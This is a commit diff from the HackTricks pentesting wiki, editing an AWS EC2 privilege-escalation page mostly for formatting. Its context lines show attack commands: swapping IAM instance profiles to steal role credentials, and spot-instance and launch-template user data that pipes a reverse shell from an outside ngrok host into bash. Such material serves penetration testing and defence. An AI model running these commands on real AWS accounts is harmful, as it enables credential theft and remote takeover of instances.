GITBOOK-472: change request with no subject merged in GitBook

HackTricks-wiki · Oct 16, 2023 · f1ed553 · f1ed553
1 parent 554d2b9
commit f1ed553
Show file tree

Hide file tree

Showing 2 changed files with 20 additions and 6 deletions.
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md
@@ -56,6 +56,7 @@ An important note to make about this attack is that an **obvious indicator of co
 
 With this set of permissions you could also **create an EC2 instance and register it inside an ECS cluster**. This way, ECS **services** will be **run** in inside the **EC2 instance** where you have access and then you can penetrate those services (docker containers) and **steal their ECS roles attached**.
 
+{% code overflow="wrap" %}
 ```bash
 aws ec2 run-instances \
     --image-id ami-07fde2ae86109a2af \
@@ -70,6 +71,7 @@ aws ec2 run-instances \
 #!/bin/bash
 echo ECS_CLUSTER=<cluster-name> >> /etc/ecs/ecs.config;echo ECS_BACKEND_HOST= >> /etc/ecs/ecs.config;
 ```
+{% endcode %}
 
 To learn how to **force ECS services to be run** in this new EC2 instance check:
 
@@ -84,31 +86,39 @@ If you **cannot create a new instance** but has the permission `ecs:RegisterCont
 ### **`iam:PassRole`,** **`iam:AddRoleToInstanceProfile`**
 
 Similar to the previous scenario, an attacker with these permissions could **change the IAM role of a compromised instance** so he could steal new credentials.\
-As an instance profile can only have 1 role, if the instance profile **already has a role** (common case), he will also need **`iam:RemoveRoleFromInstanceProfil`**`e`.
+As an instance profile can only have 1 role, if the instance profile **already has a role** (common case), you will also need **`iam:RemoveRoleFromInstanceProfile`**.
 
+{% code overflow="wrap" %}
 ```bash
 # Removing role from instance profile
 aws iam remove-role-from-instance-profile --instance-profile-name <name> --role-name <name>
 
 # Add role to instance profile
 aws iam add-role-to-instance-profile --instance-profile-name <name> --role-name <name>
 ```
+{% endcode %}
 
 If the **instance profile has a role** and the attacker **cannot remove it**, there is another workaround. He could **find** an **instance profile without a role** or **create a new one** (`iam:CreateInstanceProfile`), **add** the **role** to that **instance profile** (as previously discussed), and **associate the instance profile** compromised to a compromised i**nstance:**
 
 * If the instance **doesn't have any instance** profile (`ec2:AssociateIamInstanceProfile`)
-  * ```
+  * {% code overflow="wrap" %}
+    ```bash
     aws ec2 associate-iam-instance-profile --iam-instance-profile <value> --instance-id <value>
     ```
+    {% endcode %}
 * If it **has an instance profile**, you can **remove** the instance profile (`ec2:DisassociateIamInstanceProfile`) and **associate** it
-  * ```
+  * {% code overflow="wrap" %}
+    ```bash
     aws ec2 disassociate-iam-instance-profile --iam-instance-profile <value> --instance-id <value>
     aws ec2 associate-iam-instance-profile --iam-instance-profile <value> --instance-id <value>
     ```
+    {% endcode %}
 * or **replace** the **instance profile** of the compromised instance (`ec2:ReplaceIamInstanceProfileAssociation`).
-  * ```
+  * {% code overflow="wrap" %}
+    ```bash
     aws ec2 replace-iam-instance-profile-association --iam-instance-profile <value> --association-id <value>
     ```
+    {% endcode %}
 
 **Potential Impact:** Direct privesc to a different EC2 role (you need to have compromised a AWS EC2 instance and some extra permission or specific instance profile status).
 
@@ -117,6 +127,7 @@ If the **instance profile has a role** and the attacker **cannot remove it**, th
 An attacker with the permissions **`ec2:RequestSpotInstances`and`iam:PassRole`** can **request** a **Spot Instance** with an **EC2 Role attached** and a **rev shell** in the **user data**.\
 Once the instance is run, he can **steal the IAM role**.
 
+{% code overflow="wrap" %}
 ```bash
 REV=$(printf '#!/bin/bash
 curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash
@@ -126,6 +137,7 @@ aws ec2 request-spot-instances \
    --instance-count 1 \
    --launch-specification "{\"IamInstanceProfile\":{\"Name\":\"EC2-CloudWatch-Agent-Role\"}, \"InstanceType\": \"t2.micro\", \"UserData\":\"$REV\", \"ImageId\": \"ami-0c1bc246476a5572b\"}"
 ```
+{% endcode %}
 
 ### `ec2:ModifyInstanceAttribute`
 
@@ -176,6 +188,7 @@ aws ec2 start-instances --instance-ids $INSTANCE_ID
 
 An attacker with the permissions **`ec2:CreateLaunchTemplateVersion`,`ec2:CreateLaunchTemplate`and `ec2:ModifyLaunchTemplate`** can create a **new Launch Template version** with a **rev shell in** the **user data** and **any EC2 IAM Role on it**, change the default version, and **any Autoscaler group** **using** that **Launch Templat**e that is **configured** to use the **latest** or the **default version** will **re-run the instances** using that template and will execute the rev shell.
 
+{% code overflow="wrap" %}
 ```bash
 REV=$(printf '#!/bin/bash
 curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash
@@ -189,6 +202,7 @@ aws ec2 modify-launch-template \
    --launch-template-name bad_template \
    --default-version 2
 ```
+{% endcode %}
 
 **Potential Impact:** Direct privesc to a different EC2 role.
 
@@ -237,6 +251,7 @@ An attacker with the permission **`ec2-instance-connect:SendSerialConsoleSSHPubl
 
 In order to connect to the serial port you also **need to know the username and password of a user** inside the machine.
 
+{% code overflow="wrap" %}
 ```bash
 aws ec2 enable-serial-console-access
 
@@ -248,6 +263,7 @@ aws ec2-instance-connect send-serial-console-ssh-public-key \
 
 ssh -i /tmp/priv $INSTANCE_ID.port0@serial-console.ec2-instance-connect.eu-west-1.aws
 ```
+{% endcode %}
 
 This way isn't that useful to privesc as you need to know a username and password to exploit it.
 

diff --git a/...-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md b/...-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md
@@ -220,8 +220,6 @@ Techniques like SSM message interception can be found in the SSM post-exploitati
 
 **Elastic Load Balancing** (ELB) is a **load-balancing service for Amazon Web Services** (AWS) deployments. ELB automatically **distributes incoming application traffic** and scales resources to meet traffic demands.
 
-<figure><img src="https://lh6.googleusercontent.com/cRBL0xfhe4VRn6PU0Bs_NPx937HqgdYxYNkRAh0WmQFfVZfyYg6X1rhpJwmVIQXIEeepQcUoJipsdH-qmacm8Dw49H539e2ygb2A5hQWGjMh_SAEHOfhygtTLINR2h5l6p4NiiMMO7g0LTZiFpdBB9IeEA=s2048" alt=""><figcaption></figcaption></figure>
-
 ### Enumeration
 
 ```bash
-Original file line number
+Diff line change
@@ Expand Up @@
     **Elastic Load Balancing** (ELB) is a **load-balancing service for Amazon Web Services** (AWS) deployments. ELB automatically **distributes incoming application traffic** and scales resources to meet traffic demands.
-    <figure><img src="https://lh6.googleusercontent.com/cRBL0xfhe4VRn6PU0Bs_NPx937HqgdYxYNkRAh0WmQFfVZfyYg6X1rhpJwmVIQXIEeepQcUoJipsdH-qmacm8Dw49H539e2ygb2A5hQWGjMh_SAEHOfhygtTLINR2h5l6p4NiiMMO7g0LTZiFpdBB9IeEA=s2048" alt=""><figcaption></figcaption></figure>
     ### Enumeration
     ```bash
@@ Expand Down @@